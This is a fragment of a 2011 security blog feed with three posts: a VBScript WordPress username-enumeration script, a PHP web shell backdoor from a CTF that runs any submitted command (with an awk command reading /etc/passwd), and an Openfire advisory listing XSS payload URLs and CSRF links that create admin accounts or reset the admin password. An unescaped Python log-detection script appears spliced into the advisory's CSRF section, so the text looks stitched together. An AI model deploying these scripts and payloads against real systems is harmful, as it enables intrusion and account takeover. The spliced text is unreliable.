/></author><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2011/05/apache-archiva-multiple-xss-csrf.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Dk4CQno-fip7ImA9WhZVF0g.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-7958721311476391422</id><published>2011-05-29T07:23:00.000-07:00</published><updated>2011-05-30T04:29:23.456-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-30T04:29:23.456-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="wordpress" /><category scheme="http://www.blogger.com/atom/ns#" term="full disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="poc" /><category scheme="http://www.blogger.com/atom/ns#" term="xmlhttp" /><category scheme="http://www.blogger.com/atom/ns#" term="ajax" /><category 
scheme="http://www.blogger.com/atom/ns#" term="username enumeration" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="vbscript" /><title>WordPress UserId &amp; Username Enumeration Exploit/PoC Script</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;On 26th May 2011, a relatively easy-to-detect-and-exploit vulnerability was found in WordPress. The issue is that WordPress discloses usernames based on a simple URL parameter and the resulting page redirect/HTTP status. Although WordPress shows usernames in the title bar as a feature, this can be abused easily by repeatedly supplying an author=number parameter to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493&lt;br /&gt;&lt;br /&gt;Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;'Author: karniv0re@null.co.in&lt;br /&gt;'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3&lt;br /&gt;'This script allows an attacker to enumerate wordpress users by &lt;br /&gt;'querying the value of the parameter 'author' using xmlHTTP.&lt;br /&gt;&lt;br /&gt;Dim url, sQuery, args, i, max&lt;br /&gt;&lt;br /&gt;if wscript.arguments.count &amp;lt; 1 then&lt;br /&gt;wscript.echo "WPEnum - WordPress User Enumeration Script"&lt;br /&gt;wscript.echo "Author: karniv0re@null.co.in"&lt;br /&gt;wscript.echo "Insufficient Parameters."&lt;br /&gt;wscript.echo&lt;br /&gt;wscript.echo "cscript WPEnum.vbs &amp;lt;url&amp;gt; [&amp;lt;max_users&amp;gt;]"&lt;br /&gt;wscript.echo "&amp;lt;url&amp;gt;: A 
WordPress based website in the form of http://site/"&lt;br /&gt;wscript.echo "&amp;lt;max_users&amp;gt;:[Optional] Maximum number of users. Default 20."&lt;br /&gt;wscript.echo "Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10"&lt;br /&gt;wscript.echo&lt;br /&gt;wscript.quit&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;set args = wscript.Arguments&lt;br /&gt;&lt;br /&gt;wscript.echo "WPEnum - WordPress User Enumeration Script"&lt;br /&gt;wscript.echo "Author: karniv0re@null.co.in"&lt;br /&gt;wscript.echo&lt;br /&gt;wscript.echo "Enumerating ..."&lt;br /&gt;wscript.echo&lt;br /&gt;&lt;br /&gt;i=0&lt;br /&gt;max=20&lt;br /&gt;url = args(0)&lt;br /&gt;if right(url,1)&amp;lt;&amp;gt; "/" then&lt;br /&gt;url = url &amp;amp; "/"&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;if wscript.arguments.count = 2 AND IsNumeric(args(1)) then&lt;br /&gt;max=args(1)&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;Set xmlHTTP = Nothing&lt;br /&gt;set xmlHTTP = CreateObject("Microsoft.XmlHttp")&lt;br /&gt;&lt;br /&gt;For i=1 to max&lt;br /&gt;'Use the normalised url (with trailing slash) rather than the raw argument&lt;br /&gt;sQuery = url &amp;amp; "?author=" &amp;amp; i&lt;br /&gt;xmlHTTP.open "GET", sQuery, false&lt;br /&gt;xmlHTTP.send ""&lt;br /&gt;&lt;br /&gt;wscript.sleep 70&lt;br /&gt;&lt;br /&gt;do while not xmlHTTP.readyState=4&lt;br /&gt;Loop&lt;br /&gt;&lt;br /&gt;if xmlHTTP.status = 404 then&lt;br /&gt;  wscript.echo&lt;br /&gt;  i=i-1&lt;br /&gt;  wscript.echo i &amp;amp; " users enumerated."&lt;br /&gt;  wscript.echo "Done!"&lt;br /&gt;  Set xmlHTTP = Nothing&lt;br /&gt;  wscript. 
quit&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;wscript.echo "Userid:" &amp;amp; i&lt;br /&gt;&lt;br /&gt;k = Instr(Lcase(xmlHTTP.responseText),"&amp;lt;title&amp;gt;")&lt;br /&gt;j = Instr(Lcase(xmlHTTP.responseText),"&amp;lt;/title&amp;gt;")&lt;br /&gt;username = Mid(xmlHTTP.responseText, k+7, j-k-7)&lt;br /&gt;wscript.echo username&lt;br /&gt;wscript.echo&lt;br /&gt;Next&lt;br /&gt;&lt;br /&gt;wscript.echo i &amp;amp; " users enumerated."&lt;br /&gt;wscript.echo "Done!"&lt;br /&gt;&lt;br /&gt;Set xmlHTTP = Nothing&lt;br /&gt;&lt;br /&gt;'End of program&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/Gn_Olv3273s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/7958721311476391422/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2011/05/wordpress-userid-username-enumeration.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7958721311476391422?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7958721311476391422?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/Gn_Olv3273s/wordpress-userid-username-enumeration.html" title="WordPress UserId &amp; Username Enumeration Exploit/PoC Script" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" 
/></author><thr:total>1</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2011/05/wordpress-userid-username-enumeration.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0UHQnk9fCp7ImA9WhZTFUo.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-7495228330711645405</id><published>2011-03-19T16:35:00.000-07:00</published><updated>2011-03-19T17:00:33.764-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-19T17:00:33.764-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web application" /><category scheme="http://www.blogger.com/atom/ns#" term="LFI" /><category scheme="http://www.blogger.com/atom/ns#" term="CTF" /><category scheme="http://www.blogger.com/atom/ns#" term="HITB" /><category scheme="http://www.blogger.com/atom/ns#" term="backdoor" /><category scheme="http://www.blogger.com/atom/ns#" term="php" /><category scheme="http://www.blogger.com/atom/ns#" term="shell" /><category scheme="http://www.blogger.com/atom/ns#" term="hacking" /><title>Simple PHP Web Application Backdoor</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5  sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. 
It was then only a matter of time before people who found this started uploading web application shells which would then be called from the application's home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Commands prebuilt into the page allow attackers to search for files that are world readable, open reverse-connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here's the code:&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;title&amp;gt;&lt;br /&gt;simple php shell PoC - karniv0re&lt;br /&gt;&amp;lt;/title&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;h2&amp;gt;System Info&amp;lt;/h2&amp;gt;&lt;br /&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";&lt;br /&gt;echo "uname -a:\t".exec ("uname -a")."\n";&lt;br /&gt;echo "id:\t\t".exec("id")."\n";&lt;br /&gt;echo "current wd:\t".exec ("pwd")."\n";&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;&amp;lt;form method="post"&amp;gt;&lt;br /&gt;&amp;lt;input type="text" name="cmd"&amp;gt;&lt;br /&gt;&amp;lt;input type="submit" value="Execute!"&amp;gt;&lt;br /&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;&amp;lt;h2&amp;gt;Command Output&amp;lt;/h2&amp;gt;&lt;br /&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;if(isset($_POST['cmd'])){&lt;br /&gt; $cmd = $_POST['cmd'];&lt;br /&gt; if (strlen($cmd)==0){&lt;br /&gt; $cmd = "true";&lt;br /&gt; }&lt;br /&gt; system($cmd);&lt;br /&gt; die;&lt;br /&gt;}&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br 
/&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;To get a list of users once you have uploaded and gained access to your shell, you can run:&lt;/span&gt;&lt;br /&gt;&lt;pre&gt;awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd&lt;/pre&gt;&lt;span style="font-family:trebuchet ms;"&gt;Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely executing and displaying.&lt;br /&gt;&lt;br /&gt;Happy Hacking!&lt;br /&gt;&lt;/span&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/8wIBAsTtygI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/7495228330711645405/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2011/03/simple-php-web-application-backdoor.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7495228330711645405?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7495228330711645405?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/8wIBAsTtygI/simple-php-web-application-backdoor.html" title="Simple PHP Web Application Backdoor" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2011/03/simple-php-web-application-backdoor.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;DkEAR3o-eyp7ImA9Wx9UGEk.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-6210810762529438975</id><published>2011-02-15T23:56:00.000-08:00</published><updated>2011-02-16T00:24:06.453-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-02-16T00:24:06.453-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="openfire" /><category scheme="http://www.blogger.com/atom/ns#" term="csrf" /><category scheme="http://www.blogger.com/atom/ns#" term="bid" /><category scheme="http://www.blogger.com/atom/ns#" term="admin" /><category scheme="http://www.blogger.com/atom/ns#" term="xss" /><category scheme="http://www.blogger.com/atom/ns#" term="owasp" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><title>Multiple XSS and XSRF issues in Openfire 3.6.4</title><content type="html">&lt;span style="font-family:trebuchet ms;"&gt;I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. 
The following links are the original advisory postings and the exploit code:&lt;br /&gt;http://www.securityfocus.com/bid/45682&lt;br /&gt;http://secunia.com/advisories/42799&lt;br /&gt;http://packetstormsecurity.org/files/author/8144/&lt;br /&gt;http://www.exploit-db.com/exploits/15918/&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The following is the condensed disclosure document for the vulnerabilities:&lt;br /&gt;Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Project: Openfire&lt;br /&gt;Severity: High&lt;br /&gt;Versions: 3.6.4 (other versions may be affected)&lt;br /&gt;Exploit type: Multiple XSS and CSRF&lt;br /&gt;Fixes Available: None&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Timeline:&lt;br /&gt;14 October 2010:  Vendor Contacted&lt;br /&gt;15 October 2010:  Vendor Response received. Asks to verify the issues in beta.&lt;br /&gt;28 October 2010:  Informed Vendor that multiple pages are still vulnerable&lt;br /&gt;03 November 2010: Acknowledgement / Update requested&lt;br /&gt;03 November 2010: Update received. 
No fixes initiated.&lt;br /&gt;23 November 2010: Informed vendor disclosure date set to 1/12/2010&lt;br /&gt;22 December 2010: Update requested.&lt;br /&gt;22 December 2010: Vendor asks to release information as the vulnerabilities are already known&lt;br /&gt;23 December 2010: A different contact at the Vendor location informs that there are no updates.&lt;br /&gt;24 December 2010: Disclosure date set to 5 January 2011&lt;br /&gt;05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Product Description:&lt;br /&gt;Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.&lt;br /&gt;(Source: http://www.igniterealtime.org/projects/openfire/)&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Affected Files/Locations/Modules:&lt;br /&gt;XSS:&lt;br /&gt;login.jsp&lt;br /&gt;security-audit-viewer.jsp&lt;br /&gt;user-create.jsp&lt;br /&gt;plugins/search/advance-user-search.jsp&lt;br /&gt;user-roster-add.jsp&lt;br /&gt;user-roster.jsp&lt;br /&gt;group-create.jsp&lt;br /&gt;group-edit.jsp&lt;br /&gt;group-delete.jsp&lt;br /&gt;muc-room-edit-form.jsp&lt;br /&gt;muc-room-delete.jsp&lt;br /&gt;plugins/clientcontrol/create-bookmark.jsp&lt;br /&gt;plugins/clientcontrol/spark-form.jsp&lt;br /&gt;&lt;br /&gt;CSRF:&lt;br /&gt;user-create.jsp&lt;br /&gt;user-password.jsp&lt;br /&gt;user-delete.jsp&lt;br /&gt;group-create.jsp&lt;br /&gt;group-edit.jsp&lt;br /&gt;group-delete.jsp&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;User can insert HTML or execute arbitrary 
JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.&lt;br /&gt;Successful exploitation of these vulnerabilities could result in, but is not limited to, compromise of the application, theft of&lt;br /&gt;cookie-based authentication credentials, arbitrary URL redirection, disclosure or modification of sensitive data and phishing attacks.&lt;br /&gt;&lt;br /&gt;Since the vulnerabilities exist in the administrative module, a successful attack could cause a complete compromise of the entire application.&lt;br /&gt;&lt;br /&gt;An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.&lt;br /&gt;----------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;Persistent XSS:&lt;br /&gt;http://target-url/login.jsp?url=&amp;amp;username=test" onfocus=javascript:window.location.assign('http://www.google.com');"&gt;&lt;br /&gt;&lt;br /&gt;http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');"&gt;&lt;br /&gt;     &lt;br /&gt;http://target-url/security-audit-viewer.jsp?range=15&amp;amp;username=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;search=Search&lt;br /&gt;&lt;br /&gt;http://target-url/user-create.jsp?username=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-create.jsp?name=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-create.jsp?email=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;http://target-url/plugins/search/advance-user-search.jsp?criteria=test&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br 
/&gt;http://target-url/user-roster-add.jsp?username=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-roster-add.jsp?username=user&amp;amp;jid=1&amp;amp;nickname=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;email=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;add=Add+Item&lt;br /&gt;&lt;br /&gt;http://target-url/user-roster.jsp?username=test&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;http://target-url/user-lockout.jsp?username=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;http://target-url/group-create.jsp?name=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;description=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;create=Create+Group&lt;br /&gt;&lt;br /&gt;http://target-url/group-edit.jsp?creategroupsuccess=true&amp;amp;group=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;http://target-url/group-delete.jsp?group=&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br 
/&gt;http://target-url/muc-room-edit-form.jsp?save=true&amp;amp;create=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_persistentroom=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomName=23&amp;amp;mucName=conference&amp;amp;roomconfig_roomname=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomdesc=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;room_topic=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_maxusers=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_presencebroadcast=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;true&amp;amp;roomconfig_presencebroadcast2=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_presencebroadcast3=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomsecret=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_roomsecret2=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_whois=moderator&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_publicroom=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_canchangenick=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;roomconfig_registration=true&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;Submit=Save+Changes&lt;br /&gt;&lt;br /&gt;http://target-url/muc-room-delete.jsp?roomJID=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;create=false&lt;br /&gt;&lt;br 
/&gt;http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;url=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;users=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;groups=&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;rss=off&amp;amp;createURLBookmark=Create&amp;amp;type=url&lt;br /&gt;&lt;br /&gt;http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=&amp;lt;/textarea&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;submit=Update+Spark+Versions&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Stored XSS:&lt;br /&gt;http://target-url/group-create.jsp&lt;br /&gt;http://target-url/group-summary.jsp&lt;br /&gt;Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.&lt;br /&gt;Group Name: Test&amp;lt;script&amp;gt;alert("xss")&amp;lt;/script&amp;gt;&lt;br /&gt;Description: Test&amp;lt;script&amp;gt;alert("xss")&amp;lt;/script&amp;gt;&lt;br /&gt;Click on Create Group and you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes, completing the PoC.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CSRF:&lt;br /&gt;For the following links, create HTML pages with image tags whose src= attribute is one of the following links and ask the user to view these pages. 
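The XSS probes and the GET-driven CSRF actions listed in this section leave characteristic traces in the admin console's access log. As an added example (mine, not part of the advisory or of Openfire), the following Python runs a detection pass over constructed combined-format log lines; the page list and trigger parameters come from the advisory, while the console origin http://openfire.example:9090 and the client addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Openfire 3.6.4 admin pages the advisory lists as reflecting or storing unvalidated input
XSS_PAGES = {
    "/login.jsp", "/security-audit-viewer.jsp", "/user-create.jsp",
    "/user-roster-add.jsp", "/user-roster.jsp", "/user-lockout.jsp",
    "/group-create.jsp", "/group-edit.jsp", "/group-delete.jsp",
    "/muc-room-edit-form.jsp", "/muc-room-delete.jsp",
    "/plugins/search/advance-user-search.jsp",
    "/plugins/clientcontrol/create-bookmark.jsp",
    "/plugins/clientcontrol/spark-form.jsp",
}
# State-changing pages the advisory drives with a plain GET, with their trigger parameters
CSRF_ACTIONS = {
    "/user-create.jsp": ("create",), "/user-password.jsp": ("update",),
    "/user-delete.jsp": ("delete",), "/group-create.jsp": ("create",),
    "/group-edit.jsp": ("add", "updateMember"),
}
# Payload shapes from the advisory, matched on the URL-decoded value;
# \x3c is the regex escape for the less-than sign that opens a tag.
PAYLOAD_RE = re.compile(
    r"\x3c\s*/?\s*(script|textarea)"   # script tag / textarea breakout
    r"|[\"']\s*on[a-z]+\s*="           # attribute breakout: " onfocus=
    r"|javascript\s*:",                # javascript: handler body
    re.IGNORECASE,
)
# NCSA combined format: client ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) \S+ '
    r'"([^"]*)" "([^"]*)"$'
)

def parse_line(line):
    """Split one combined-format log line into the fields the checks need."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, ts, method, target, status, referer, _ua = m.groups()
    parts = urlsplit(target)
    # parse_qs percent-decodes, so %3Cscript%3E becomes a real script tag
    return {"client": client, "time": ts, "method": method,
            "path": parts.path, "status": int(status), "referer": referer,
            "params": parse_qs(parts.query, keep_blank_values=True)}

def xss_findings(req):
    """Return (parameter, decoded value) pairs that carry a payload shape."""
    if req["path"] not in XSS_PAGES:
        return []
    return [(name, value) for name, values in req["params"].items()
            for value in values if PAYLOAD_RE.search(value)]

def csrf_finding(req, console_origin):
    """Flag a state-changing GET whose Referer is not the console itself.
    A console form submission carries the console origin as Referer; an
    image tag on a third-party page carries that page or nothing. Proxies
    and privacy settings strip Referer too, so a hit is a triage signal."""
    triggers = CSRF_ACTIONS.get(req["path"])
    if not triggers or req["method"] != "GET":
        return None
    if not any(t in req["params"] for t in triggers):
        return None
    if req["referer"].startswith(console_origin):
        return None
    detail = "referer=" + req["referer"]
    if req["path"] == "/user-create.jsp" and req["params"].get("isadmin"):
        detail += " (creates an admin account)"
    return detail

def scan(lines, console_origin):
    """Run both checks; return (kind, client, path, detail) tuples."""
    alerts = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        for name, _value in xss_findings(req):
            alerts.append(("xss", req["client"], req["path"], name))
        detail = csrf_finding(req, console_origin)
        if detail:
            alerts.append(("csrf", req["client"], req["path"], detail))
    return alerts

# Constructed sample lines, not real traffic; in these Python string
# literals \x26 is the ampersand query separator.
CONSOLE = "http://openfire.example:9090"
SAMPLE_LOG = [
    # reflected XSS probe against user-create.jsp
    '10.0.0.5 - - [05/Jan/2011:10:00:01 +0000] "GET /user-create.jsp?username=test%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
    # attribute breakout in the login.jsp url parameter
    '10.0.0.5 - - [05/Jan/2011:10:00:02 +0000] "GET /login.jsp?url=hello%22%20onfocus=javascript:window.location.assign(%27http://www.google.com%27);%22%3E HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
    # admin-account creation via GET, referred from a third-party page
    '192.168.1.20 - - [05/Jan/2011:10:05:00 +0000] "GET /user-create.jsp?username=tester\x26name=Riyaz\x26password=test\x26passwordConfirm=test\x26isadmin=on\x26create=Create+User HTTP/1.1" 200 5120 "http://third-party.example/page.html" "Mozilla/5.0"',
    # the same action submitted from the console itself (benign)
    '192.168.1.20 - - [05/Jan/2011:10:06:00 +0000] "GET /user-create.jsp?username=bob\x26name=Bob\x26password=pw\x26passwordConfirm=pw\x26create=Create+User HTTP/1.1" 200 5120 "http://openfire.example:9090/user-create.jsp" "Mozilla/5.0"',
    # ordinary page view
    '192.168.1.20 - - [05/Jan/2011:10:07:00 +0000] "GET /index.jsp HTTP/1.1" 200 8000 "http://openfire.example:9090/login.jsp" "Mozilla/5.0"',
]
```

Calling scan(SAMPLE_LOG, CONSOLE) yields two xss alerts and one csrf alert for the constructed lines; a Referer-based hit is worth confirming against the console's own security audit log before acting on it.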
If a user is logged into Openfire's admin console and the HTML pages are viewed then the respective functions are called:&lt;br /&gt;http://target-url/user-create.jsp?username=tester&amp;amp;name=Riyaz&amp;amp;email=walikarriyazad%40microland.com&amp;amp;password=test&amp;amp;passwordConfirm=test&amp;amp;isadmin=on&amp;amp;create=Create+User&lt;br /&gt;http://target-url/user-create.jsp?username=tester&amp;amp;name=Riyaz&amp;amp;email=walikarriyazad%40microland.com&amp;amp;password=test&amp;amp;passwordConfirm=test&amp;amp;isadmin=on&amp;amp;create=Create+User&gt;&lt;br /&gt;http://target-url/user-password.jsp?username=admin&amp;amp;password=secure-pass&amp;amp;passwordConfirm=secure-pass&amp;amp;update=Update+Password&lt;br /&gt;http://target-url/user-password.jsp?username=admin&amp;amp;password=secure-pass&amp;amp;passwordConfirm=secure-pass&amp;amp;update=Update+Password&gt;&lt;br /&gt;http://target-url/user-delete.jsp?username=tester&amp;amp;delete=Delete+User&lt;br /&gt;http://target-url/user-delete.jsp?username=tester&amp;amp;delete=Delete+User&gt;&lt;br /&gt;http://target-url/group-create.jsp?name=NewGroup&amp;amp;description=New+Group&amp;amp;create=Create+Group&lt;br /&gt;http://target-url/group-create.jsp?name=NewGroup&amp;amp;description=New+Group&amp;amp;create=Create+Group&gt;&lt;br 